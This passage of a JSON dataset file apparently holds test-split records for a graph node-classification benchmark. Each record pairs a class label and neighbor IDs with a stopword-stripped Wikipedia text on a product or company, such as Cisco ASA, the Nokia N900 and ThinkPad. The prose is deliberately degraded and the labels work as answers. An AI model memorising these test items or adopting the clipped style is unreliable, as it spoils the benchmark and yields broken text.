classic 10000 510 520 535 boots integrated flash memory case pix 501 506/506e 515/515e 525 ws-svc-fwm-1-k9 latter part code pix technology implemented fire wall services module catalyst 6500 7600 router adaptive security appliance network firewall made cisco introduced 2005 replace cisco pix line along stateful firewall functionality another focus asa virtual private network vpn functionality also features intrusion prevention voice ip asa 5500 series followed 5500-x series 5500-x series focuses virtualization hardware acceleration security modules 2005 cisco released 5510 5520 5540 models asa continues using pix codebase asa os software transitioned major version 7.x 8.x moved finesse/pix os operating system platform linux operating system platform also integrates features cisco ips 4200 intrusion prevention system cisco vpn 3000 concentrator asa continues pix lineage intel 80x86 hardware cisco pix vpn product hacked nsa-tied group equation group somewhere 2016 equation group developed tool code-named benigncertain reveals pre-shared password attacker cve-2016-6415 equation group later hacked another group called shadow brokers published exploit publicly among others according ars technica nsa likely used vulnerability wiretap vpn-connections decade citing snowden leaks cisco asa-brand also hacked equation group vulnerability requires ssh snmp accessible attacker codename given exploit nsa extrabacon bug exploit cve-2016-6366 also leaked shadowbrokers batch exploits backdoors according ars technica exploit easily made work modern versions cisco asa leaked exploit handle 29th january 2018 security problem cisco asa-brand disclosed cedric halbronn ncc group use free-bug secure sockets layer ssl vpn functionality cisco adaptive security appliance asa software could allow unauthenticated remote attacker cause reload affected system remotely execute code bug listed cve-2018-0101",
    "neighbors": [
      7426,
      3473,
      2709,
      5531,
      3742,
      1440,
      1954,
      9764,
      8998,
      3495,
      3885,
      5677,
      7983,
      823,
      3133,
      7887,
      7893,
      6364,
      10341,
      5749,
      5368
    ],
    "mask": "Test"
  },
  {
    "node_id": 3300,
    "label": 2,
    "text": "Nokia_N900:nokia n900 nokia n900 smartphone made nokia supersedes nokia n810 default operating system maemo 5 linux-based os originally developed nokia 770 internet tablet first nokia device based upon texas instruments omap3 microprocessor arm cortex-a8 core unlike three nokia internet tablets preceding nokia n900 first maemo device include phone functionality quad-band gsm 3g umts/hsdpa n900 functions mobile internet device includes e-mail web browsing access online services 5-megapixel digital camera still video photography portable media player music video calculator games console word processor sms well mobile telephony using either mobile network voip via internet mobile wi-fi maemo provides x-terminal interface interacting core operating system launched nokia world 2 september 2009 released 11 november 2009 united states 9 european countries n900 launched alongside maemo 5 giving device overall touch-friendly interface predecessors customizable home screen mixes application icons shortcuts widgets maemo 5 supports adobe flash player 9.4 includes many applications designed specifically mobile platform new touch-friendly media player nokia n900 announced 17 september 2008 keynote presentation dr. ari jaaksi nokia new supported features announced maemo 5 cellular connectivity 3g/hspa ti omap3 processor high definition camera support news backward compatibility older internet tablets time frame established release pre-alpha maemo 5 software development kit december 2008 targeted exclusively omap3 architecture revamped user interface included support hardware graphics acceleration functionalities found internet tablets time cellular data connectivity high definition camera support first photo specifications n900 codenamed rover developed came may 2009 release fcc approval documents august 2009 confirmed device provided second codename rx-51 nokia n900 officially announced 2 september 2009 nokia world 2009 germany nokia says step 4 5 line maemo devices started 2005 nokia 770 device initially available selected markets starting november 2009 4 december uk retail price €599 finland germany italy netherlands spain €649 france 2499 zł poland 5995 kr sweden £499 united kingdom prices including vat excluding subsidies retail price launch us 649 united states excluding sales taxes subsidies available canada independent retailers around c 800 march 2010 nokia site australia lists n900 homepage hinting launch time near future black color available launch initially availability extremely limited leading delays statement nokia higher pre-order demand expected nokia n900 launched hong kong 29 may 2010 added features facilitate character handwriting input price launch 4998 hkd already released australia via optus nokia n900 powered omap 3430 arm cortex-a8 system-on-a-chip made texas instruments based 65 nanometer cmos process omap 3430 composed three microprocessors cortex a8 running 600 mhz 1.15 ghz correct overclocking used run os applications powervr sgx530 gpu made imagination technologies supports opengl es 2.0 capable 14 mpolys/s tms320c64x digital signal processors running 430 mhz used run image processing camera audio processing telephony data transmission tms320 c64x main purpose offload cortex a8 process audio video signal moreover omap 3430 n900 devices successfully over-clocked 1150 mhz using modified kernel editing kernel power configuration file system 256 mb dedicated high performance ram mobile ddr paired access 768 mb swap space managed os provides total 1 gb virtual memory nokia n900 resistive touchscreen resolution 800 × 480 pixel wvga 267 ppi according nokia xorg.log capable displaying 65k colours 565 rgb nokia n900 camera capability 2592x1944 pixels carl zeiss optics autofocus dual led flash video light geo-tagging lcd transflective permit usability wide range luminosity daylight dark haptic feedback provided touchscreen input applying small vibration sound user choose whether feature enabled stylus provided allow precise touch input access smaller user interface elements 3-axis accelerometer allows orientation screen change portrait landscape mode certain applications used user input games applications dashboard desktop active rotating device landscape portrait mode activates phone application feature also disabled user discretion update pr1.2 became possible view web pages portrait mode developers may add support portrait mode applications desired proximity sensor deactivates display touchscreen device brought near face call slide-out 4-row keyboard d-pad nokia n810 replaced nokia n900 slide-out 3-row backlit keyboard arrow keys previous internet tablets on-screen keyboard also available addition english qwerty layout slide keyboard available variants italian french german russian czech nordic finnish swedish spanish nokia n900 ambient light sensor adjusts display brightness activates backlit keyboard os comes word prediction software configured user preferences auto capitalization word completion auto spacing words device autonomous gps optional a-gps functionality comes pre-loaded ovi maps application ovi maps provides typical mapping features alternate views 3d landmarks satellite hybrid maps address/places interest searching route planning although turn-by-turn navigation yet 5-megapixel back camera autofocus feature dual led flash 4:3 16:9 aspect ratio options 3× digital zoom focal length camera 5.2 mm aperture f/2.8 focus range 10 cm infinity capable video recording 848 × 480 pixels 25 fps lens use protected sliding hatch opening hatch launches camera application although 0.3-megapixel front camera capable video recording 640 × 480 pixels pre-production units could used video calls ip using google talk retail version delivered without software enabling video calling video chatting update pr1.2 ota over-the-air skype video calling added enabling fascia camera software updates phone becomes capable play/record/stream 720p video holding device facing screen top left right rocking buttons function volume up/down zoom in/out depending context power on/off camera button pressing power button brings menu change profile activate offline mode a.k.a airplane flight mode turns emitted signals lock device either secure key code simple lock option end current task nokia n900 fewer hardware buttons makes use touchscreen display on-screen buttons example accept reject end call n900 microphone stereo speakers located side device 3.5 mm four-contact trrs connector simultaneously provides stereo audio output either microphone input video output pal ntsc tv possible using nokia video connectivity cable included upon purchase standard trrs 3x rca cable high-speed usb 2.0 usb micro-b connector provided data synchronization mass storage mode client battery charging micro-usb connector prone failure nokia n900 unlike previous versions nokia internet tablet n't enabled support usb on-the-go ability act usb host default order meet deadlines production usb certification ongoing community effort add support subsequently currently software beta stage requiring non-standard usb cable usb a-a adapter software development repository built-in bluetooth v2.1 supports wireless earpieces headphones hsp profile nokia n900 supports hardware capable stereo audio output a2dp profile built-in car hands-free kits also supported hfp profile file transfer supported ftp along opp profile sending/receiving objects possible remote control device avrcp profile dun profile permits access internet laptop dialing mobile phone wirelessly tethering hid profile provides support devices bluetooth keyboards pan profile networking using bluetooth unsupported enabled bluetooth set also functions fm receiver allowing one listen fm radio n900 also 88.1–107.9 mhz fm transmitter example play music separate radio note fm transmitter frequency range extended 76.0–107.9 mhz community supported modifications operating system furthermore nokia n900 wi-fi b/g connectivity support wep wpa wpa2 aes/tkip security protocols nokia n900 synchronize microsoft outlook activesync various e-mail calendar clients syncml bluetooth micro-usb contact information also exchanged via vcard file format supported commonly e-mail programs including evolution microsoft outlook device also features infrared port compatible irda used turn nokia n900 remote controller using third-party software battery life shipped bl-5j 1320mah battery n900 seems deficient able make full working day internet connection call usage press release nokia stated aiming one day full usage always online 2-4 days tcp/ip connected active online usage 1+ day early reports users range 12 hours wi-fi web browsing video gps 2 days online used continuously value appears highly dependent user choice background software active desktop widgets im email polling well mobile network signal quality especially 3g cases software bugs nokia reported talk times around 9 hours gsm 5 hours 3g battery life extended significantly switching gps/a-gps wi-fi bluetooth replacing 3g 2g gprs previous internet tablets used larger batteries 1500 mah compared n900 1320 mah based less efficient microprocessor typical battery time nokia n810 around 7 hours continuous full usage display wi-fi principle n900 figures expected much higher third party extended batteries 2400 mah capacity available n900 also community supported modifications performed 3rd party n900 compatible batteries usually involving putting two said batteries parallel increase effective battery capacity nokia n900 3000 mah sim card located battery accessed removing back panel nokia n900 microsd hc card socket also located back cover battery tool necessary remove back panel nokia n900 32 gb emmc 256 mb nand non-removable storage additional storage available via hot swappable microsdhc card socket claimed support 200 gb additional storage however sdhc specification supports cards 32 gb size difficulty reported use 64+ gb sdxc cards sandisk claims sdxc cards compatible n900 hot swapping achieved via software-supported magnetic sensor detects removal back cover partition residing microsdhc card unmounted back cover removed microsdhc card formatted supported file system ext2 ext3 fat16 fat32 32 gb emmc split 3 partitions 256 mb nand formatted ubifs contains bootloader kernel image root directory 100 mb free space programs larger 500 kb including dependencies stored /opt symlinked /home/opt therefore located 2 gb ext3 partition vfat partition also available storage needs used carefully unmounted exported usb cable connected device maemo 5 also known fremantle default operating system nokia n900 maemo 5 nokia adaptation linux desktop environment pocket-sized device ui fully customizable user able move widgets around add/remove widgets change background add shortcuts applications n900 comes preloaded variety applications 1500 additional applications overwhelming majority free download use created 3rd party developers custom kernels also available via app manager users need devices maemo uses upstart reduce boot time application called easy debian installs debian lxde image internal memory enabling applications iceweasel firefox browser openoffice.org suite run within maemo applications synaptic package manager included debian installation gimp run within lxde interface software also added debian using maemo chroot utility using synaptic apt-get command line stellarium zim desktop wiki accessed either via lxde desktop icons program manager shortcuts desktop nokia n900 sim application toolkit available also known operator menu possible use services require result support sim interact directly outside world initiate commands independently handset network making n900 vulnerable installation malicious sim java applications via text messages issues various value-added services resulting availability sim application toolkit include following nokia often offers new n8 e7 devices warranty replacements n900s although warranty terms consumer rights legislation differ across jurisdictions users reported success refusing pressing n900 least eu india recently august 2011 owners confident getting n900 warranty replacement often attempt repair devices sell nokia-provided replacement buy n900 instead n900 proximity sensor designed lock touch screen phone user ear prevent accidental operation locks screen unintentionally bright light usually outdoors call placed received nokia acknowledged hardware issue addressed unlock screen phone call tactile unlock switch right side device used however keep touch screen active accidental operation phone keys call may occur device used handset issue blamed application screen protectors however n900 users without screen protectors also experiencing problem n900 microusb charger port fragile people successfully fixed problem either epoxy glue resoldering usb port onto circuit board chips n900 gsm module might badly soldered circuit board resulting multiple n900 devices reported troubled inability sim card detected issue fixable putting something gsm-related chips shielding though proper fix would reballing announced may 2010 nokia n900 last mobile communication device running maemo 5 operating system replaced meego nokia continue support n900 updates necessary transition succeeding meego operating system possible mainly interest developers rather consumers officially supported nokia interest within user community working backporting meego developments maemo n900 places interesting device people within wider open source community consumers download meego operating system available officially supported nokia nokia used say meego going succeed maemo new devices however 11 february 2011 nokia announced primarily concentrating alliance microsoft meego development stopped one meego device become available 2011 3 march 2011 jukka eklund product manager meego os nokia announced meego-dev mailing list meego 1.2 developer edition n900 developed dedicated nokia team led mika leppinen target particular edition usable primary phone device developer/hacker person regular end users september 2011 announcement intel linux foundation abandoning meego favor tizen prompted developer community begin seriously doubt future meego n900 meego developer edition rename meego community edition evolved nemo based mer currently october 2012 actively developed nitdroid project ports android devices alternate operating system also available n900 however little progress made achieving voice calling nitdroid n900 main developer goes online handle e-yes moved developing devices nokia n9 community-based project aiming provide hardware upgrade n900 called neo900 began late 2013 collaboration openmoko maemo communities hardware upgrade quadruple device ram provide processor nearly twice fast one original n900 integrate additional sensors gyroscope compass likely modern lte modem also included",
    "neighbors": [
      1537,
      3585,
      529,
      10770,
      5143,
      2072,
      5659,
      6178,
      9762,
      4132,
      40,
      3626,
      9266,
      10802,
      7220,
      5175,
      1083,
      3649,
      10820,
      11337,
      9292,
      7246,
      1615,
      5201,
      7253,
      10329,
      5211,
      6748,
      10332,
      1633,
      10855,
      109,
      3205,
      9359,
      1682,
      2197,
      2199,
      10393,
      5274,
      669,
      6310,
      167,
      5290,
      10410,
      7866,
      1728,
      4291,
      708,
      7877,
      199,
      4305,
      6870,
      5339,
      2784,
      1761,
      9443,
      4324,
      7399,
      8423,
      2285,
      1776,
      8433,
      9972,
      2308,
      11539,
      8472,
      11545,
      5406,
      804,
      7983,
      821,
      11062,
      823,
      1849,
      2361,
      7492,
      10053,
      3911,
      5969,
      6996,
      854,
      10583,
      1377,
      10599,
      6505,
      8554,
      9581,
      5998,
      10606,
      2420,
      10109,
      8577,
      9605,
      11655,
      1424,
      2449,
      8083,
      405,
      7063,
      5019,
      10655,
      10658,
      4003,
      8621,
      8627,
      7617,
      8643,
      967,
      9163,
      3537,
      5078,
      6618,
      5095,
      1520,
      10227,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 3301,
    "label": 3,
    "text": "Telechips:telechips telechips fabless company headquartered seoul founded 1999 regional offices japan china singapore designs integrated circuits company sells system chip products used automotive entertainment systems consumer electronics based arm architecture support android windows embedded compact nucleus rtos linux telechips also sells development kits",
    "neighbors": [
      644,
      392,
      8842,
      781,
      146,
      659,
      1428,
      9235,
      2838,
      11282,
      7833,
      666,
      5786,
      4508,
      6391,
      11289,
      1057,
      4258,
      7077,
      38,
      9638,
      5417,
      4139,
      2862,
      2097,
      7988,
      11062,
      9913,
      6971,
      8253,
      8383,
      321,
      7745,
      7747,
      8003,
      6981,
      9155,
      10562,
      10945,
      2635,
      5963,
      9163,
      2814,
      1871,
      1872,
      6608,
      7631,
      980,
      2388,
      4821,
      9174,
      10199,
      2524,
      9182,
      6495,
      2784,
      1377,
      99,
      2788,
      8812,
      9964,
      11629,
      6001,
      373,
      1014,
      3575,
      10361,
      3835,
      638
    ],
    "mask": "Test"
  },
  {
    "node_id": 3302,
    "label": 7,
    "text": "ServedBy_The_Net:servedby net servedby net llc cloud computing provider specializing infrastructure service company provides infrastructure efforts virtual servers storage server backup company current slogan serving clouds seattle servedby net founded seattle washington joshua breeds breeds developed interest cloud technology sector age 10 developed first web hosting company years later breeds founded servedby net llc 2011 working biochemistry degree university washington 2014 organization technology partner microsoft vmware parallels suse f5 networks servedby net offers cloud iaas infrastructure service well hosted services managed cloud services domain name registration",
    "neighbors": [
      4194,
      5178,
      4429,
      10020
    ],
    "mask": "Test"
  },
  {
    "node_id": 3303,
    "label": 2,
    "text": "Windows_Internal_Database:windows internal database windows internal database codenamed wyukon sometimes referred sql server embedded edition variant sql server express 2005–2014 included windows server 2008 sql 2005 windows server 2008 r2 sql 2005 windows server 2012 sql 2012 windows server 2012 r2 sql 2012 windows server 2016 sql 2014 included free microsoft products released 2007 require sql server database backend windows sharepoint services 3.0 windows server update services 3.0 include windows internal database used alternative using retail edition sql server wid 32-bit application even component windows server 2008 64-bit installs path windows server 2012 later 64-bit application installed windows internal database available standalone product use end-user applications microsoft provides sql server express microsoft sql server purpose additionally designed accessible windows services running machine several components windows server 2008 2012 use windows internal database data storage active directory rights management services windows system resource manager uddi services active directory federation services 2.0 ipam windows sharepoint services windows server 2003 sharepoint windows server update services install windows internal database use default data store retail sql server database instance provided knowledge base article published microsoft states windows internal database identify removable component provides instructions may uninstalled calling windows installer directly sql server management studio express used connect instance windows internal database using codice_1 2003–2008 codice_2 2012 instance name work locally remote connections enabled edition sql server also note windows authentication used opposed sql server authentication administrators seem best results authenticating successfully logged using administrative account created windows installed",
    "neighbors": [
      10900,
      10902,
      11030,
      7064,
      5401,
      4505,
      11414,
      4384,
      8227,
      11683,
      11559,
      4010,
      10157,
      9263,
      11570,
      6709,
      8246,
      7486,
      4674,
      1347,
      1348,
      5320,
      4174,
      847,
      83,
      1366,
      1498,
      603,
      9434,
      8159,
      608,
      2401,
      8161,
      7523,
      11498,
      3821,
      10991,
      3573,
      9205,
      5754,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 3304,
    "label": 3,
    "text": "ThinkPad:thinkpad thinkpad line business-oriented laptop computers tablets designed developed marketed sold lenovo formerly ibm thinkpads known minimalist black boxy design initially modeled 1990 industrial designer richard sapper based concept traditional japanese bento lunchbox revealing nature opened according later interviews sapper also characterized simple thinkpad form elementary simple black cigar box similar proportions offers 'surprise opened thinkpad line first developed ibm yamato facility japan led arimasa naitoh dubbed father thinkpad first thinkpads released october 1992 considered innovative became large success ibm decade thinkpads especially popular businesses older models revered technology enthusiasts collectors power users due durable design relatively high resale value abundance aftermarket replacement parts thinkpads received somewhat cult following small loyal fanbase throughout years aftermarket parts developed models custom motherboards current processors created x60 x200 thinkpad laptops used outer space 2003 laptops certified use international space station name thinkpad product ibm corporate history culture thomas j. watson sr. first introduced think ibm slogan 1920s every minicomputer mainframe ibm installed almost leased – sold blue plastic sign placed atop operator console think command aluminum plate decades ibm distributed small notepads word think emblazoned brown leatherette cover customers employees name thinkpad suggested ibm employee denny wainwright think notepad pocket name opposed ibm corporate naming committee names ibm computers numeric time thinkpad kept due praise journalists public thinkpad ibm answer toshiba compaq notebook market well apple dec task making notebook given yamato facility japan led arimasa naitoh japanese man joined ibm 1970s dubbed father thinkpad ibm pushing thinkpad 1992 launch keep harvard business school happy april 1992 ibm announced first thinkpad tablet computer news conference first thinkpad tablet penpoint-based device formally known ibm 2521 thinkpad positioned developer release thinkpad tablet became available purchase general public october year addition giving innovative name ibm marketed thinkpad imaginative activities early customer pilot programs numerous pre-launch announcements extensive loaner program designed showcase product strengths weaknesses ibm even worked archaeologists excavating ancient egyptian city leontopolis field test thinkpad device loaned dig team summer resulting report documented thinkpad excellent performance difficult conditions report said thinkpad impressive machine rugged enough used without special care worst conditions egypt offer first thinkpad model announced april 1992 700 renamed 700t release three newer models 300 new 700 700c october 1992 bright red trackpoint kind pointing stick embedded keyboard enabled notebook used without external pointing device first thinkpads successful collecting 300 awards design quality thinkpad 755c laptop computers used payload general support computers aboard space shuttle 1990s thinkpad 760ed also tested part shuttle–mir program period 760ed computer used without modification model used space program contained intel 133 mega hertz pentium processor 48 megabytes ram four speed cd-rom power supply unit 1.44 megabyte floppy disk drive two 1.2 gigabyte hard drives accessories use space laptops subject radiation could cause errors 760ed noted improvement area 755c traditionally black thinkpads commonly featured magnesium carbon fiber reinforced plastic titanium composite cases thinkpad introduced innovations including trackpoint pointing device thinklight led keyboard light top lcd screen active protection system accelerometer sensor detects thinkpad falling shuts hard disk drive prevent damage roll cage design minimize motherboard flex stainless steel hinges biometric fingerprint reader client security solution improves security using built-in trusted platform module tpm facilitates deployment corporate environment thinkvantage technologies suite computer management applications drain holes help reduce damage keyboard components accidental spillage original design concept thinkpad created 1990 italy-based designer richard sapper corporate design consultant ibm since 2005 lenovo sapper noted design classic products tizio lamp artemide office chair knoll kitchenwares alessi ballpoint lamy design based concept traditional japanese bento lunchbox revealing nature opened according later interviews sapper also characterized simple thinkpad form elementary simple black cigar box similar proportions offers 'surprise opened computers also known iconic red trackpoint variation joystick middle keyboard first thinkpad notebook 700c announced 1992 first new product emerge ibm differentiated product personality strategy resulting collaboration sapper tom hardy head corporate ibm design program development 700c also involved close working relationship sapper kazuhiko yamazaki lead notebook designer ibm yamato design center japan liaison sapper yamato engineering 1990–1992 pre-internet collaboration italy japan facilitated special sony digital communications system transmitted high-res images telephone lines system established several key global design centers hardy ibm designers could visually communicate effectively interact directly sapper advice projects innovative design management leadership thinkpad development hardy named innovator year 1992 pc magazine since 1992 thinkpad design regularly updated developed refined years sapper respective teams ibm later lenovo included yamazaki tom takahashi sam lucente since 1995 david hill vice president user experience design leads manages design/user experience thinkpad hill approach maintaining evolution sapper original thinkpad design analogous porsche manages evolution classic 911 fold-out butterfly keyboard appeared thinkpad 701 series designed sapper collaboration sam lucente john karidis widely considered design masterpiece display museum modern art new york city thinkpad 760 series also included unusual keyboard design keyboard elevated two arms riding small rails side screen tilting keyboard achieve ergonomic design although almost models feature trackpoint models touchpad left right buttons possibly making mouse clicks less ergonomic touchpads x220 double regular mouse buttons also case newer models december 2013 cause problems accidental clicking much pressure exerted mouse movements occasion 20th anniversary thinkpad introduction david hill authored designed commemorative book thinkpad design titled thinkpad design spirit essence book revealed event held moma thinkpads especially popular businesses older models revered technology enthusiasts collectors power users due durable design relatively high resale value abundance aftermarket replacement parts thinkpads received somewhat cult following small loyal fanbase throughout years laptop magazine 2006 called thinkpad highest-quality laptop computer keyboard available ranked first reliability support pc magazine 2007 survey lenovo thinkpad pc magazine 2006 reader choice pc based laptops ranked number 1 support pc based laptops thinkpad series first product receive pc world hall fame award enderle group rob enderle said constant thing thinkpad brand stands quality build best keyboard business thinkpad x tablet-series pc magazine editor choice tablet pcs thinkpad x60s ranked number one ultraportable laptops pc world lasted 8 hours 21 minutes single charge 8-cell battery lenovo thinkpad x60s series pc world top 100 products 2006 2005 pc world reliability service survey ranked thinkpad products ahead brands reliability 2004 survey ranked second behind emachines lenovo named environment-friendly company electronics industry greenpeace 2007 since dropped place 14 17 october 2010 lenovo thinkpad t60p received editor choice award mobile graphic workstation pc magazine lenovo thinkpad x60 pc magazine editor choice among ultra-portable laptops lenovo thinkpad t400-series pc world top 100 products 2009 thinkpad laptops 2003 laptops certified use international space station 2017 currently operate linux windows xp windows vista software nasa purchased 500 thinkpad 750 laptops flight qualification software development crew training astronaut senator john glenn used thinkpad laptops spaceflight mission sts-95 1998 thinkpad models used shuttle missions include least three thinkpad 750c left spektr module mir module depressurized laptops used aboard space shuttle international space station feature safety operational improvements weightless environment must operate modifications include velcro tape attach surfaces upgrades cpu video card cooling fans accommodate microgravity hotter air n't rise lower density cabin air adapter station 28 volt dc power thinkpad 750 flew aboard space shuttle endeavour mission repair hubble space telescope 2 december 1993 thinkpad 750c task run nasa test program determined radiation inherent space environment causes memory anomalies 750c generates unexpected problems 755c also used 760ed tested well part shuttle–mir test thinkpads used conjunction joystick portable in-flight landing operations trainer pilot throughout 2006 thinkpad a31p used service module central post international space station seven thinkpad a31p laptops service orbit aboard international space station 2010 space station equipped 68 thinkpad a31 computers along 32 new lenovo thinkpad t61p laptops plus dedicated ip phone also limited video phone capabilities work incorporating laptops station lan continued june 2011 laptops aboard iss connected station lan via wi-fi connected ground 3 mbit/s 10 mbit/s comparable home dsl connection speeds 2005 chinese technology company lenovo purchased ibm personal computer business thinkpad flagship brand along speaking purchase ibm personal computer division liu chuanzhi said benefited three ways ibm acquisition got thinkpad brand ibm advanced pc manufacturing technology company international resources global sales channels operation teams three elements shored sales revenue past several years although lenovo acquired right use ibm brand name five years acquisition ibm personal computer business lenovo used three years majority thinkpad computers since 2005 acquisition brand lenovo made china addition chinese manufacturing facilities lenovo employs 300 people combined manufacturing distribution center near american headquarters morrisville north carolina device made facility packed box sports red-white-and-blue sticker proclaiming whitsett north carolina 2012 lenovo partially moved production thinkpad line computers japan thinkpads produced nec yonezawa yamagata akaemi watanabe president lenovo japan said japanese glad see return domestic production goal realize full-scale production improve image make products acceptable japanese customers 2014 although sales rose 5.6 percent previous year lenovo lost position top commercial notebook maker however company celebrated milestone 2015 shipment 100 millionth unit thinkpad line lenovo laptops x230 w530 t430 block third-party batteries lenovo calls feature battery safeguard first introduced models may 2012 laptops feature scan security chips thinkpad-branded batteries contain affected thinkpads flash message stating genuine lenovo battery attached third-party batteries used thinkpad yoga ultrabook-class convertible device functions laptop tablet computer yoga gets name consumer-oriented ideapad yoga line computers form factor thinkpad yoga backlit keyboard flattens flipped tablet mode accomplished platform surrounding keys rises level keyboard buttons locking mechanism prevents key presses feet pop prevent keyboard directly resting flat surfaces lenovo implemented design response complaints earlier yoga 13 11 models awkward use tablet mode reinforced hinge required implement design convertible form factor thinkpad yoga retains standard thinkpad features black magnesium-reinforced chassis island keyboard red trackpoint large buttonless trackpad released august 2011 thinkpad tablet first lenovo line business-oriented tablets thinkpad brand tablet described gadget mix premium business tablet since tablet primarily business-oriented includes features security anti-theft software ability remotely disable tablet sd card encryption layered data encryption cisco virtual private network vpn additionally thinkpad tablet able run software ibm lotus notes traveler stylus could used write notes tablet also included software convert handwritten content text another feature tablet drag-and-drop utility designed take advantage tablet touch capabilities feature could used transfer data usb devices internal storage sd card slashgear summarized thinkpad tablet saying stylus styling add distinctive slate n't merely attempt ape apple ipad order celebrate 20th anniversary thinkpad lenovo held large party new york announced several products including tablet 2 lenovo says thinkpad tablet 2 available 28 october 2012 windows 8 released thinkpad tablet 2 runs windows 8 professional operating system able run desktop software compatible version windows tablet 2 based clover trail version intel atom processor customized tablets tablet 2 2 gigabytes ram 64gb ssd tablet 2 10.1-inch ips display 16:9 aspect ratio resolution preview cnet wrote windows 8 looked readable functional metro standard windows-based interfaces mini-hdmi port included video output 8-megapixel rear camera 2-megapixel front camera included along noise-canceling microphone order facilitate video conferencing announced released january 2014 thinkpad 8 based intel bay trail atom z3770 processor 2 gb ram 128 gb built-in storage thinkpad 8 8.3-inch ips display 16:10 aspect ratio resolution pixels features include aluminum chassis micro-hdmi port 8-megapixel back camera flash optional 4g connectivity runs windows 8 operating system announced may 2014 lenovo thinkpad 10 successor thinkpad tablet 2 scheduled launch summer 2014 along accessories docking station external detachable magnetic keyboards used windows 8.1 pro operating system available 64 128gb variants 1.6ghz quad-core intel atom baytrail processor 2gb 4gb ram optionally supported 3g 4g lte display resolution announced paired stylus pen thinkpad x1 tablet fanless tablet powered core cpus available 4 8 16gb lpddr3 ram sata pcie nvme ssds 1tb ips screen supports touch pen input thinkpad 11e budget laptop computer schools students 11-inch screen without trackpoint 11e yoga convertible version 11e e series low-cost thinkpad line designed small business mass-market requirements currently contains 14 15 sub-lines e series line laptops replaced lenovo edge series somewhere countries currently may 2019 offered thinkpad edge/e series names l series replaced former r series positioned mid-range thinkpad offering mainstream intel core i3/i5/i7 cpus l series 3 sub-lines long-running 14 15.6 launched line two models l412 l512 2010 2018 also 13 l380 available replaces thinkpad 13 main difference e series l series basic mil-std-810 certification l series thinkpads series historically high-end features magnesium alloy rollcages high-density ips screens known flexview discontinued t60 series 7-row keyboards screen latches lenovo ultrabay thinklight models included 14.1-inch 15.4-inch displays available 4:3 16:10 aspect ratios since 2012 entire thinkpad line given complete overhaul modifications removal separate buttons use trackpoint reintroduced 2015 removal separate audio control buttons removal screen latch removal led indicator lights new ultra-portable models t430u t431s non-replaceable batteries newer models combination built-in replaceable battery enabling user switch replaceable without putting computer hibernation also non-widescreen displays longer available 16:9 aspect ratio remaining choice x series main high-end ultraportable thinkpad line offering lightweight highly portable laptop moderate performance current sub-lines x series includes daughter line includes x1 tablet confused 2005-2013 x series tablets mainstream current workhorse models x390 x390 yoga 13 successors classic discountinued 12 line lenovo x series thinkpads premium 14 /15 thin-and-light line 13.3 thinkpad models x300/x301 ultrabay cd-rom removable battery replaced modern premium x1-series ultrabook line x1 carbon x1 yoga x1 extreme sub-series discountinued mainstream lines 12 x200 x201 x220 models could ordered high-end thinkpad features like trackpoint thinklight 7-row keyboard docking port hot-swappable hdd solid magnesium case optional slice battery discontinued 12.5 x220 x230 still featured roll cage thinklight optional premium ips display first ips display non-tablet thinkpad since t60p 7-row keyboard offered x220 however lacked lid latch mechanism present previous x200 x201 versions discontinued slim 12 line contained x200s x201s low power cpus high resolution displays x230s low power cpus 12.5 x series thinkpads x240 later simplified design last 12 x280 model trackpoint feature partially magnesium case simplified docking port obsolete low-cost 11.6 netbook line x100e x120e plastic lacking latch thinklight using variant island keyboard known chiclet keyboard found edge series x100e also offered red addition blue white countries like high-end netbooks whereas x200 series like full ultraportables featuring intel core previously core 2 celeron series cpus rather amd netbook cpus x series tablet suffixes outdated variant 12 x series models low voltage cpus flip-screen tablet resistive touchscreen include traditional thinkpad features noted using higher quality affs-type screen better viewing angles compared screens used thinkpads p series line laptops replaced lenovo w series p series excluding models suffix designed engineers architects animators etc comes variety high-end options p series models included fingerprint readers first generation comes variety high-end options intel xeon processors 4k screens ddr4 ram 64gb 1080p screens intel core series cpus pcie ssds come standard p series uses cooling system known flex features two fans connected heat pipe located near cpu gpu three-button touchpad included color calibrator dropped nvidia pascal gpus new dock stations side connection port hardware update optional oled screen p1 gen2 thinkpad stack line products includes accessories designed portability interoperability line includes external hard drives wireless router power bank bluetooth 4.0 speaker stack device includes rubber feet magnets pogo-pin power connections allow use single cable combined weight stack devices slightly less two pounds stack series announced january 2015 international ces stack series accessories expanded 2016 international ces include 720p resolution projector 150 lumens brightness wireless charging station stack blocky black rectangular look thinkpad logo shares common design language thinkpad laptop computers dock stations finder thinkpad usb 3.0 secure hard drive thinkpad keyboards thinkpad stands japan-only thinkpad 235 type 2607 progeny ibm/ricoh rios project also known clavius chandra2 contains unusual features like presence three pcmcia slots use dual camcorder batteries source power features intel pentium mmx 233 mhz cpu support 160 mb edo memory built-in hard drive udma support hitachi marketed chandra2 prius note 210 ultraportable thinkpad 240 x z started intel celeron processor went 600 mhz intel pentium iii models using intel 440bx chipset ram expandable 320 mb max bios update screen key pitch standard key pitch also one first thinkpad series contain built-in mini pci card slot form factor 3b 240s optical disc drives external floppy drive optional extended battery sticks bottom like bar props back laptop weighing smallest lightest thinkpads ever made 300-series 300 310 340 350 360 365 380 385 390 various sub-series long-running value series starting 386sl/25 processor way pentium iii 450 300 series offered slightly lower-price alternative 700 series exceptions thinkpad 360pe unique model series could used regular laptop transform tablet flipping monitor top retailing 3,699 1995 360pe featured touch sensitive monitor operated stylus machine could run operating systems supported touch screen pendos 2.2 500-series 500 510 560 e x z 570 e main line ultraportable thinkpads starting 486slc2-50 blue lightning pentium iii 500 machines hard disk board drives external 570 case ultrabase weighed around 600-series 600 600e 600x direct predecessors series 600-series packed svga xga tft lcd pentium mmx pentium ii iii processor full-sized keyboard optical bay package weighing roughly ibm able create light fully featured machine using lightweight strong carbon fiber composite plastics battery shipped 600-series models manufacturing defect left vulnerable memory effect resulted poor battery life problem avoided use third-party battery 700-series 700 701 720 730 tablet 750 755 760 765 770 various sub-models considered cutting-edge intel-based thinkpads featured best screens largest hard drives fastest processors available time first successful thinkpad introduced 1992 first thinkpad tablet pc 700t model without keyboard mouse thinkpad 800-series 800/820/821/822/823/850/851/860 unique based powerpc architecture rather intel x86 architecture 800 series laptops used powerpc 603e cpu speeds 100 mhz 166 mhz 860 model although earliest 800 type 6020 direct ancestor 850 used 603 apparently offered developers units used scsi-2 instead ide hard disks id every scsi device system could configured cursor driven gui-based bios another unusual aspect series unique startup chime reminiscent apple macintosh computers time powerpc thinkpad line considerably expensive standard x86 thinkpads—even modestly configured 850 cost upwards 12,000 hand 800 850 851 later 860 